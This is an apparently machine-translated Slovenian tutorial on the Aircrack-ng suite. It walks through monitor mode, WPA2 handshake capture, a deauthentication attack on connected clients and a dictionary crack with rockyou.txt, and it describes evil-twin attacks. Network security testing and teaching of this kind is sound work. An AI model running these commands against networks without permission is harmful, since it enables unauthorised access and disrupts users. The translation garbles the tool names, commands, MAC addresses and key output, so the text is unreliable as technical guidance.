Kako uporabljati Aircrack-ng

How Use Aircrack Ng



Večinoma ljudje nikoli ne pomislijo na omrežje, s katerim so povezani. Nikoli ne pomislijo, kako varno je to omrežje in koliko dnevno tvegajo svoje zaupne podatke. Preverjanje ranljivosti v svojih omrežjih WiFi lahko izvedete z zelo zmogljivim orodjem, imenovanim Aircrack-ng in Wireshark. Wireshark se uporablja za spremljanje omrežne dejavnosti. Aircrack-ng je bolj kot agresivno orodje, ki vam omogoča krampanje in dostop do brezžičnih povezav. Razmišljanje kot vsiljivec je bilo vedno najvarnejši način, da se zaščitite pred krampanjem. Morda boste lahko spoznali natančna dejanja, ki jih bo vsiljivec izvedel za dostop do vašega sistema, če se bo naučil o letalih. Nato lahko v svojem sistemu izvedete preverjanje skladnosti, da zagotovite, da ni varen.

Aircrack-ng je celoten nabor programske opreme, namenjene preizkušanju varnosti omrežja WiFi. To ni samo eno orodje, ampak zbirka orodij, od katerih ima vsako svoj namen. Delati je mogoče na različnih področjih zaščite WiFi, na primer spremljanje dostopne točke, testiranje, napad na omrežje, razbijanje omrežja wifi in njegovo testiranje. Ključni cilj Aircracka je prestrezanje paketov in dešifriranje razpršilcev za razbijanje gesel. Podpira skoraj vse nove brezžične vmesnike. Aircrack-ng je izboljšana različica zastarele zbirke orodij Aircrack, ki se nanaša na Nova generacija . Nekaj ​​odličnih orodij, ki skupaj delujejo pri večji nalogi.







Airmon:

Airmon-ng je vključen v komplet aircrack-ng, ki omrežno kartico vmesnika postavi v način monitorja. Omrežne kartice običajno sprejemajo samo pakete, ki so namenjeni njim, kot je opredeljeno v naslovu MAC omrežne kartice, z airmon-ng pa bodo sprejeti tudi vsi brezžični paketi, ne glede na to, ali so namenjeni njim ali ne. Ti paketi bi morali biti sposobni ujeti brez povezave ali preverjanja pristnosti z dostopno točko. Uporablja se za preverjanje stanja dostopne točke tako, da omrežni vmesnik preklopite v način monitorja. Najprej je treba konfigurirati brezžične kartice za vklop načina monitorja, nato pa uničiti vse procese v ozadju, če menite, da jih kateri koli proces moti. Po končanih procesih lahko na brezžičnem vmesniku omogočite način nadzora z izvajanjem spodnjega ukaza:



[zaščiteno po e -pošti]: ~ $sudoairmon-ng start wlan0#

Način monitorja lahko tudi onemogočite tako, da kadar koli ustavite airmon-ng s spodnjim ukazom:

[zaščiteno po e -pošti]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Airodump-ng se uporablja za seznam vseh omrežij, ki nas obdajajo, in za ogled dragocenih informacij o njih. Osnovna funkcionalnost airodump-ng je vohanje paketov, zato je v bistvu programirano, da zajame vse pakete okoli nas, medtem ko je v načinu monitorja. Zagnali ga bomo proti vsem povezavam okoli nas in zbrali podatke, kot so število odjemalcev, povezanih v omrežje, njihovi ustrezni naslovi mac, slog šifriranja in imena kanalov, nato pa začeli ciljati na naše ciljno omrežje.

Če vnesemo ukaz airodump-ng in mu za parameter dodelimo ime omrežnega vmesnika, lahko aktiviramo to orodje. Navedel bo vse dostopne točke, količino podatkovnih paketov, uporabljene metode šifriranja in preverjanja pristnosti ter ime omrežja (ESSID). S hekerskega vidika so naslovi mac najpomembnejša polja.

[zaščiteno po e -pošti]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack se uporablja za razbijanje gesla. Ko zajamemo vse pakete z uporabo airodumpa, lahko ključ razbijemo z letalom. Te ključe razbije z dvema metodama PTW in FMS. Pristop PTW poteka v dveh fazah. Sprva se uporabljajo samo paketi ARP, šele nato, če ključ po iskanju ni razpokan, uporabi vse ostale zajete pakete. Prednost pristopa PTW je, da se za pokanje ne uporabljajo vsi paketi. Pri drugem pristopu, to je FMS, za razbijanje ključa uporabljamo tako statistične modele kot alge surove sile. Uporabite lahko tudi slovarsko metodo.

Predvajanje v zraku:

Airplay-ng uvaja pakete v brezžično omrežje za ustvarjanje ali pospeševanje prometa. Aireplay-ng lahko zajame pakete iz dveh različnih virov. Prvi je živo omrežje, drugi pa paketi iz že obstoječe datoteke pcap. Airplay-ng je uporaben med napadom odpravljanja pristnosti, ki cilja na brezžično dostopno točko in uporabnika. Poleg tega lahko nekatere napade, kot je napitek z latte kavo, izvedete z orodjem airplay-ng, ki vam omogoča, da dobite ključ iz odjemalčevega sistema. To lahko dosežete tako, da ulovite paket ARP in ga nato manipulirate ter pošljete nazaj v sistem. Odjemalec bo nato ustvaril paket, ki ga lahko zajame airodump in aircrack razbije ključ iz tega spremenjenega paketa. Nekatere druge možnosti napada airplay-ng vključujejo chopchop, fragmentarno predvajanje itd.

Letalska baza:

Airbase-ng se uporablja za pretvorbo računalnika vsiljivca v ogroženo povezavo, na katero se lahko povežejo drugi. Z Airbase-ng lahko trdite, da ste zakonita dostopna točka in izvajate napade 'človek v sredini' na računalnike, ki so priključeni na vaše omrežje. Tovrstni napadi se imenujejo Evil Twin Attacks. Osnovni uporabniki ne morejo ločiti med legalno dostopno točko in lažno dostopno točko. Torej grožnja zlobnih dvojčkov je med najbolj grozečimi brezžičnimi grožnjami, s katerimi se soočamo danes.

Airolib-ng:

Airolib pospeši postopek vdora s shranjevanjem in upravljanjem seznamov gesel in dostopne točke. Sistem za upravljanje baz podatkov, ki ga uporablja ta program, je SQLite3, ki je večinoma na voljo na vseh platformah. Razbijanje gesla vključuje izračun glavnega ključa v parih, skozi katerega se izvleče zasebni prehodni ključ (PTK). S pomočjo PTK lahko za določen paket določite identifikacijsko kodo okvirnega sporočila (MIC) in teoretično ugotovite, da je MIC podoben paketu, zato je bil, če je bil PTK pravilen, tudi PMK pravilen.

Če si želite ogledati sezname gesel in dostopati do omrežij, shranjenih v bazi podatkov, vnesite naslednji ukaz:

[zaščiteno po e -pošti]: ~ $sudoairolib-ng testdatabase –stats

Tu je baza podatkovnih baz podatkov, do katere želite dostopati ali jih ustvariti, –stats pa operacija, ki jo želite izvesti na njej. Na poljih baze podatkov lahko izvedete več operacij, na primer dajanje največje prednosti nekemu SSID -ju ali kaj podobnega. Če želite uporabiti airolib-ng z aircrack-ng, vnesite naslednji ukaz:

[zaščiteno po e -pošti]: ~ $sudoletenje v zraku-rtestdatabase wpa2.eapol.cap

Tukaj uporabljamo že izračunane PMK, shranjene v testna baza podatkov za pospešitev procesa razbijanja gesel.

Razbijanje WPA/WPA2 z uporabo Aircrack-ng:

Poglejmo majhen primer, kaj lahko aircrack-ng naredi s pomočjo nekaj svojih odličnih orodij. Predhodni ključ omrežja WPA/WPA2 bomo zlomili z uporabo slovarske metode.

Prva stvar, ki jo moramo storiti, je, da navedemo omrežne vmesnike, ki podpirajo način monitorja. To lahko storite z naslednjim ukazom:

[zaščiteno po e -pošti]: ~ $sudoairmon-ng

Nabor čipov gonilnika vmesnika PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Vidimo lahko vmesnik; zdaj moramo omrežni vmesnik, ki smo ga našli (wlx0), postaviti v način monitorja z naslednjim ukazom:

[zaščiteno po e -pošti]: ~ $sudoairmon-ng start wlx0

Omogočil je način monitorja na vmesniku, imenovanem wlx0mon .

Zdaj bi morali začeti poslušati oddaje bližnjih usmerjevalnikov prek našega omrežnega vmesnika, ki smo ga preklopili v način monitorja.

[zaščiteno po e -pošti]: ~ $sudoairodump-ng wlx0mon

CH5 ][Preteklo:30s][ 2020-12-02 00:17



Svetilniki BSSID PWR#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -štiri, pet 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10: BE-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: DAJE:88: FA:38: 02-68 28 2 0 enajst54e WPA2 CCMP PSK TP-Link_3802



Sonda BSSID STATION PWR Rate Lost Frames



E4: 6F:13: 04: CE:315C: 3A:Štiri, pet: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13

Naše ciljno omrežje je Crackit v tem primeru, ki trenutno deluje na kanalu 1.

Tukaj, da razbijemo geslo ciljnega omrežja, moramo ujeti 4-smerno rokovanje, kar se zgodi, ko se naprava poskuša povezati z omrežjem. Zajamemo ga lahko z naslednjim ukazom:

[zaščiteno po e -pošti]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -v /doma wlx0

-c : Kanal

–Bss : Bsid ciljnega omrežja

-v : Ime imenika, kamor bo postavljena datoteka pcap

Zdaj moramo počakati, da se naprava poveže z omrežjem, vendar obstaja boljši način za snemanje rokovanja. Naprave lahko odpravimo avtentifikacijo v AP z napadom na odpravo pristnosti z naslednjim ukazom:

[zaščiteno po e -pošti]: ~ $sudoaireplay-ng-0 -zaE4: 6F:13: 04: CE:31

do : Bsid ciljnega omrežja

-0 : napad odkrivanja pristnosti

Odklopili smo vse naprave in zdaj moramo počakati, da se naprava poveže z omrežjem.

CH1 ][Preteklo:30s][ 2020-12-02 00:02][Rokovanje WPA: E4: 6F:13: 04: CE:31



Svetilniki BSSID PWR RXQ#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



Sonda BSSID STATION PWR Rate Lost Frames



E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Štiri, pet: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Dobili smo zadetek in če pogledamo v zgornji desni kot tik ob času, vidimo, da je bil ujet stisk roke. Zdaj poglejte v določeno mapo ( /domov v našem primeru) za a .pcap mapa.

Za razbijanje ključa WPA lahko uporabimo naslednji ukaz:

[zaščiteno po e -pošti]: ~ $sudoletenje v zraku-a2 -vrockyou.txt-bE4: 6F:13: 04: CE:31rokovanje.cap

b: Bssid ciljnega omrežja

-a2: način WPA2

Rockyou.txt: Slovarmaparabljeno

Rokovanje.cap: Themapa kivsebuje ujet rokovanje

Aircrack-ng1.2beta3

[00:01:49] 10566ključi preizkušeni(1017.96do/s)

KLJUČNO NAJDENO! [dobil si me]

Glavni ključ: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FpetdesetC


Prehodni ključ: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FpetdesetC025 62E9 5D71

Ključ do našega ciljnega omrežja je bil uspešno razbit.

Zaključek:

Brezžična omrežja so povsod, uporabljajo jih vsa podjetja, od delavcev, ki uporabljajo pametne telefone, do industrijskih krmilnih naprav. Po raziskavah bo skoraj 20 odstotkov internetnega prometa leta 2021 prek WiFi. Brezžična omrežja imajo številne prednosti, komunikacija zunaj vrat, hiter dostop do interneta na mestih, kjer je skoraj nemogoče postaviti žice, lahko razširi omrežje brez namestitve kablov za katerega koli drugega uporabnika in lahko preprosto povežete svoje mobilne naprave z domačimi pisarnami, ko vas ni.

Kljub tem prednostim obstaja velik vprašaj o vaši zasebnosti in varnosti. Kot ta omrežja; v dosegu oddajnika so usmerjevalniki odprti za vse, jih je mogoče zlahka napasti in vaše podatke je mogoče zlahka ogroziti. Če ste na primer povezani z nekim javnim brezžičnim omrežjem Wi -Fi, lahko vsak, ki je povezan s tem omrežjem, preprosto preveri vaš omrežni promet z uporabo nekaj inteligence in s pomočjo čudovitih orodij, ki so na voljo, in ga celo izbriše.